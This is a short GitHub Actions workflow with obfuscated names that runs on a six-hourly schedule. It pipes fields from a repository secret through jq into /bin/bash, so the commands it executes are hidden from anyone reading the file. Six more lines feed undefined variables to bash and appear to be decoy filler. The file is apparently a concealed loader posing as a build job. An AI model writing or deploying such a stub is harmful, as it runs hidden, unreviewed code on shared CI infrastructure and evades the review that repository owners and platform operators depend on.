name: zhaliangyy
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaliangyy
        env:
          omz2670: ${{ secrets.omz2670 }}
        run: |
          echo $omz2670 | jq -r .dbei077 | /bin/bash
          echo $blpd221 | jq -r .uuid74900 | /bin/bash
          echo $ck7749 | jq -r .cwmyd7365 | /bin/bash
          echo $aenq3 | jq -r .nlvd58 | /bin/bash
          echo $fer748 | jq -r .obfdp55 | /bin/bash
          echo $ucx8038 | jq -r .xdijx294 | /bin/bash
          echo $touma457 | jq -r .yhsfq15155 | /bin/bash

